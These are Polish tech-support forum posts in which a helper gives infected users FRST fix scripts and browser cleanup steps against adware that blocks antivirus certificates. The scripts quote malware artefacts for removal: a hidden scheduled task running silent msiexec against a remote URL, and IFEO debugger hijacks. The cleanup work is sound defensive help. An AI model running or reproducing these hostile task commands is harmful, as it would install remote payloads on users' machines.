C:\WINDOWS\SysWOW64\1 C:\WINDOWS\SysWOW64\1111 C:\WINDOWS\SysWOW64\2222 C:\WINDOWS\SysWOW64\3333 CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Ustaw Internet Explorer jako domyślną przeglądarkę. 4. Zrób nowe logi FRST: - Standardowe z opcji Skanuj (Scan), bez Shortcut. - W polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt. Eggper;Firefox Dołącz też plik fixlog.txt. Na Pulpicie pojawił się również plik edge.reg - shostuj go gdzieś i podaj link do pliku.

Popraw link do forum. Certyfikat jest ważny tylko dla adresu z www, który jest zdefiniowany jako główny URL forum. Działa: https://www.fixitpc.pl/ Nie działa: https://fixitpc.pl/ Automatyczne przekierowanie adresu bez www na adres z www ma być zrobione w dalszym terminie.

Wszystko pomyślnie usunięte, AdwCleaner i inne programy zabezpieczające odblokowane, obecnie brak oznak infekcji. Jeśli nadal system wolno działa, problem nie leży w infekcji. I sugeruję deinstalację Baidu Antivirus, który pojawił się w trakcie próby rozwiązania problemu. Jest to przeciętny i nierozwijany (w wersji anglojęzycznej) antywirus, powiązany też z kontrowersyjnymi technikami instalacji PUP (np. AdwCleaner usuwa niektóre komponenty Baidu). Na Windows 10 nie jest nawet potrzebny dodatkowy AV, wbudowany Windows Defender spełnia rolę całkiem dobrze. Poza tym, w Dzienniku zdarzeń są notowalne błędy związane z tym software: Dziennik System: ============= Error: (06/05/2017 08:07:07 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Baidu Hook Base z powodu następującego błędu: Urządzenie dołączone do komputera nie działa. Po wykonaniu deinstalacji potrzebne nowe raporty FRST (bez Shortcut), by potwierdzić, że wszystkie startowe obiekty Baidu zostały odinstalowane.

Mam też prośbę, by nie stosować serwisów hostujących obrazy, które nadal działają w trybie http. Być może nawet je zablokuję, by zapobiec postowaniu takich linków. Przykładowy hosting obrazków działający w pożądanym trybie https: Postimage.

"HKU\S-1-5-21-*" to nie wirus tylko normalny identyfikator konta użytkownika, obecny w każdym Windows. Problem leży gdzie indziej, malware wprowadziło blokadę programów zabezpieczających w oparciu o funkcję Niezaufanych certyfikatów, dlatego m.in. AdwCleaner nie działa (blokada certyfikatu Malwarebytes). Działania do przeprowadzenia: 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: StartBatch: netsh advfirewall reset reg export HKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Gibon\Desktop\cert.reg EndBatch: HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (U) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (U) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (U) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (U) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (U) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (U) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (U) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (U) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (U) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (U) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (U) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (U) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) GroupPolicy: Ograniczenia GroupPolicyScripts: Ograniczenia HKU\S-1-5-21-1068828578-3051605171-1808777383-1001\...\Run: [AMDDVR] => "C:\Program Files\AMD\CNext\CNext\amddvr.exe" HKU\S-1-5-21-1068828578-3051605171-1808777383-1001\...\Run: [AceStream] => C:\Users\Gibon\AppData\Roaming\ACEStream\engine\ace_engine.exe SearchScopes: HKU\S-1-5-21-1068828578-3051605171-1808777383-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = IE trusted site: HKU\S-1-5-21-1068828578-3051605171-1808777383-1001\...\hola.org -> hxxp://hola.org CHR HomePage: Default -> hxxps://www.google.com/?trackid=sp-006 CHR StartupUrls: Default -> "hxxps://www.google.com/?trackid=sp-006" DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\_acestream_cache_ C:\ProgramData\23134L12724y42610N90718 C:\ProgramData\24706L95268y64492N99499 C:\ProgramData\70954L64362y73548N59425 C:\ProgramData\Kaspersky Lab Setup Files C:\ProgramData\SoftwareUpdateTemp.xml EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Rozszerzenia > odinstaluj Video Downloader professional. To niezaufane rozszerzenie, powiązane z aktywnością adware. 3. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt. Na Pulpicie powstał też plik cert.reg, shostuj go gdzieś i podaj link do tego pliku.

Jeśli nadal potrzebujesz pomocy, zajmę się tym tematem teraz. Proszę potwierdź czy to nadal aktualne. Jeśli tak, nowe raporty FRST są potrzebne.

Forum zostało przekierowane na bezpieczny https://www.fixitpc.pl/. Od teraz w przeglądarkach główne strony forum są identyfikowane ikoną kłódki. Jednak na niektórych pod-stronach forum (w określonych tematach) może się pokazać komunikat o "mieszanej zawartości" ze względu na linki do obrazów ze źródeł adresowanych via http. - Linki do fixitpc.pl zostaną podmienione hurtem w bazie danych w późniejszym terminie. Zrobione. - Linki do zewnętrznych źródeł (np. serwisów hostujących obrazy) niestety pozostaną, jeżeli dany serwis nie obsługuje https.

Adware wprowadziło blokadę programów zabezpieczających w oparciu o funkcję Niezaufanych certyfikatów, dlatego nie da się uruchomić m.in. AdwCleaner (blokada certyfikatu Malwarebytes). Poza tym są tu fałszywe przeglądarki "Chrome" i "Firefox" i masa innych śmieci. Działania do przeprowadzenia: 1. Przez Panel sterowania odinstaluj niepożądany program YAC(Yet Another Cleaner!). 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 7D7F4414CCEF168ADF6BF40753B5BECD78375931 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (Avast Antivirus/Software) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Avast Antivirus/Software) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Avast Antivirus/Software) HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [GalaxyClient] => [X] HKU\S-1-5-21-489643024-731826354-959299013-1000\...\Run: [background_fault] => C:\Users\Lambert\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software) HKLM\...\Providers\1ol3sxub: C:\Program Files (x86)\Clihotain Configuration\local64spl.dll IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe ShellExecuteHooks: Brak nazwy - {6A69B0BA-392B-11E7-B267-64006A5CFC23} - C:\Users\Lambert\AppData\Roaming\Prageghtthasuy\Cohispphokisy.dll [145408 2017-05-20] () ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku WMI_ActiveScriptEventConsumer_ASEC: CHR HomePage: Default -> hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag CHR StartupUrls: Default -> "hxxp://www.luckysearch123.com?type=hp&ts=1495813616&from=ca9a0525&uid=wdcxwd1200js-00mhb0_wd-wcann104216642166&z=7e527a4ccae801a9a9a6823gbz6tcw5b4gdccoceag" HKU\S-1-5-21-489643024-731826354-959299013-1000\...\ChromeHTML: -> C:\Program Files (x86)\Hippig\Application\chrome.exe (Google Inc.) HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&q={searchTerms} HKU\S-1-5-21-489643024-731826354-959299013-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6,&vp=ch&prd=set_ie SearchScopes: HKU\S-1-5-21-489643024-731826354-959299013-1000 -> {9A91F84A-3E08-4774-B825-7A6604704214} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H5Kzbcnbl1BU,6a532031-42f4-47fc-916e-b7d6d8da77f6, ShortcutWithArgument: C:\Users\Lambert\Desktop\Gówno\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h5kzbcnbl1bu,6a532031-42f4-47fc-916e-b7d6d8da77f6, ShortcutWithArgument: C:\Users\Lambert\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495817398&z=539fb33b098d581863e9993g4z3tcw5b0g1q1t5bbg&from=che0812&uid=WDCXWD1200JS-00MHB0_WD-WCANN104216642166 R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-06-01] (TODO: ) [brak podpisu cyfrowego] S2 DsSvc; C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0}\packages\Win81_SDK\9bcb3fab78e80d68be28892ea7ad46c3.msp [84 2017-05-25] () [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [98456 2017-05-25] () S2 glory; C:\Users\Lambert\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\Lambert\AppData\Roaming\WinSAPSvc\WinSAP.dll [1886720 2017-06-01] () [brak podpisu cyfrowego] U3 aswbdisk; Brak ImagePath U2 snare; Brak ImagePath S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] U2 terana; Brak ImagePath S3 VGPU; System32\drivers\rdvgkmd.sys [X] S3 xhunter1; \??\C:\Windows\xhunter1.sys [X] Task: {032BAD74-97C2-43DE-B45B-88930DDF692F} - System32\Tasks\{D7AFBC4C-4474-49BE-80F6-F744826C4525} => C:\Program Files (x86)\Diablo II\Diablo II.exe Task: {2F04D6BD-444A-40B0-9AAF-7E16B78A5008} - System32\Tasks\{C3660774-1430-4C6F-8E8D-021096A1846D} => C:\Users\Lambert\Desktop\adwcleaner_6.040.exe [2016-12-03] () Task: {494E40C4-7065-4724-A0CD-372B912DCB61} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-06-01] () Task: {55CA615F-492D-4305-B18F-FC520019D725} - System32\Tasks\{C5C828EA-3D5C-4845-B204-7FE4C2AE81FA} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17" Task: {93CDB1CB-5A6C-4B17-925E-CA176B66A3E4} - System32\Tasks\Overwolf Updater Task => C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe Task: {CB1675FB-1CFE-4EA8-B420-931065D8D9E8} - System32\Tasks\Keyboard Checksum Verifier => Rundll32.exe "C:\Program Files\Keyboard Checksum Verifier\Keyboard Checksum Verifier.dll",xVbAXgKyh Task: {CB4D2BD4-C91B-46A3-ACDC-B7BAFFF58620} - System32\Tasks\Arujogh Cloud => C:\Program Files (x86)\Walchshjit\yaupdcache.exe Task: {DB4CEECD-3E4F-4CF8-90E1-AC0086D93F9C} - System32\Tasks\IBUpd2 => C:\Users\Lambert\AppData\Local\BrowserAir\48.0.0.0\updater.exe Task: {E5191DB7-0019-441E-A4BD-7057B820C5F5} - System32\Tasks\Clihotain Configuration => C:\Program Files (x86)\Walchshjit\ficult.exe Task: {E81B7F83-F695-4905-BD35-AAD17C8649AE} - System32\Tasks\Microsoft\Windows\DeviceSettings\Thupetherbeqerph => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD1200JS-00MHB0_WD-WCANN104216642166&d=20170520 /q Task: {E976FE0B-314A-4A6F-AF68-E8A931C88CFB} - System32\Tasks\Trojan Remover => C:\Program Files\Loaris Trojan Remover\ltr.exe Task: {FA76DE69-D3A4-481C-BF44-2C2DC557314C} - System32\Tasks\SMW_UpdateTask_Time_3835313734393736322d2355786c325a5b5734412d34 => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 Task: {FE9FF048-6797-4E07-AA29-BBDCC273E036} - System32\Tasks\{F688C87D-DD38-4E0F-9D49-BFF7ECC53E4D} => pcalua.exe -a "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17\ModdingWayInstaller.exe" -d "C:\Users\Lambert\Desktop\SERIE A OFFICIAL HD KIT PACK V1 2016-17" DeleteKey: HKCU\Software\Google\Chrome\Extensions DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla\Firefox\Extensions DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins CMD: netsh advfirewall reset C:\$AV_ASW C:\Cosusp C:\Pipisy C:\Program Files\1ol3sxub C:\Program Files\AVAST Software C:\Program Files\Keyboard Checksum Verifier C:\Program Files\MK C:\Program Files\Common Files\509E0 C:\Program Files\Common Files\Noobzo C:\Program Files (x86)\Clihotain Configuration C:\Program Files (x86)\Firefox C:\Program Files (x86)\Hippig C:\Program Files (x86)\MIO C:\Program Files (x86)\Walchshjit C:\ProgramData\log.binb C:\ProgramData\log.ewbb C:\ProgramData\log.ewbt C:\ProgramData\.mono C:\ProgramData\AVAST Software C:\ProgramData\BIT C:\ProgramData\Loaris C:\ProgramData\SearchModule C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Max Payne-ROKA1969.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Diablo II C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolekcja Klasyki C:\ProgramData\Microsoft\Windows\Start Menu\Programs\San Andreas Multiplayer C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-LINK C:\ProgramData\Microsoft\Windows\Start Menu\Programs\YeaDesktop C:\ProgramData\Package Cache\{00C5024D-925C-4E9E-A8E6-F9B84ABE0DA0} C:\Stuvatybugtain C:\Users\Lambert\AppData\Local\{CDB39C7B-51CB-4A3E-BDF9-8D90DE43D449} C:\Users\Lambert\AppData\Local\AdvinstAnalytics C:\Users\Lambert\AppData\Local\background_fault C:\Users\Lambert\AppData\Local\BrowserAir C:\Users\Lambert\AppData\Local\Firefox C:\Users\Lambert\AppData\Local\glory C:\Users\Lambert\AppData\Local\Hippig C:\Users\Lambert\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk C:\Users\Lambert\AppData\Local\Phoceshgrherry C:\Users\Lambert\AppData\Local\snare C:\Users\Lambert\AppData\Local\terana C:\Users\Lambert\AppData\Local\THQ C:\Users\Lambert\AppData\Roaming\AVAST Software C:\Users\Lambert\AppData\Roaming\DAEMON Tools Lite C:\Users\Lambert\AppData\Roaming\Event Monitor C:\Users\Lambert\AppData\Roaming\Firefox C:\Users\Lambert\AppData\Roaming\Google C:\Users\Lambert\AppData\Roaming\Microleaves C:\Users\Lambert\AppData\Roaming\Mozilla\Firefox\naweriweentcofise C:\Users\Lambert\AppData\Roaming\Prageghtthasuy C:\Users\Lambert\AppData\Roaming\Showuk C:\Users\Lambert\AppData\Roaming\UCChannel C:\Users\Lambert\AppData\Roaming\WinSAPSvc C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome (2).lnk C:\Users\Lambert\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Lambert\Desktop\AdwCleaner Portable AdwCleaner 5.019 PL C:\Users\Lambert\Desktop\Gówno\Battlefield 1942.lnk C:\Users\Lambert\Desktop\Gówno\Counter-Strike Source.lnk C:\Users\Lambert\Desktop\Gówno\DAEMON Tools Lite.lnk C:\Users\Lambert\Desktop\Gówno\Diablo III.lnk C:\Users\Lambert\Desktop\Gówno\Grand Theft Auto Vice City.lnk C:\Users\Lambert\Desktop\Gówno\GTA Vice City.lnk C:\Users\Lambert\Desktop\Gówno\MassEffectConfig.lnk C:\Users\Lambert\Desktop\Gówno\Quick Server.lnk C:\Users\Lambert\Desktop\Gówno\San Andreas Multiplayer.lnk C:\Users\Lambert\Desktop\Gówno\Skype.lnk C:\Users\Lambert\Desktop\Gówno\Spartan.lnk C:\Users\Lambert\Downloads\AdwCleaner*.exe C:\Users\Lambert\Downloads\Emsisoft*.exe C:\Users\Lambert\Downloads\Loaris*.exe C:\Users\Lambert\Downloads\Malwarebytes*.exe C:\Users\Lambert\Downloads\ReimageRepair.exe C:\Users\Public\Desktop\Google Chrome.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\Reimage.ini C:\Windows\csrss.exe C:\Windows\taskmgr.exe C:\Windows\Azart C:\Windows\system32\Drivers\*.tmp C:\Windows\system32\log Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zostały usunięte skróty do fałszywych przeglądarek, więc zrób ręcznie skróty do prawdziwych. Ustaw wybraną przeglądarkę jako domyślna. Następnie po kolei wyczyść przeglądarki z adware: Firefox: Wyeksportuj zakładki, o ile jest co eksportować. Zamknij Firefox i wywołaj menedżer profilów poprzez klawisz z flagą Windows + R i wklejenie poniższej komendy w polu Uruchom i OK. W menedżerze usuń wszystkie widoczne profile i załóż nowy, zaloguj się na niego. "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Unlimited Free VPN - Hola. To niepożądane rozszerzenie, powiązane z aktywnością para-botnet Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). 4. Zrób nowy log FRST z opcji Skanuj (Scan), bez Shortcut. Dołącz też plik fixlog.txt.

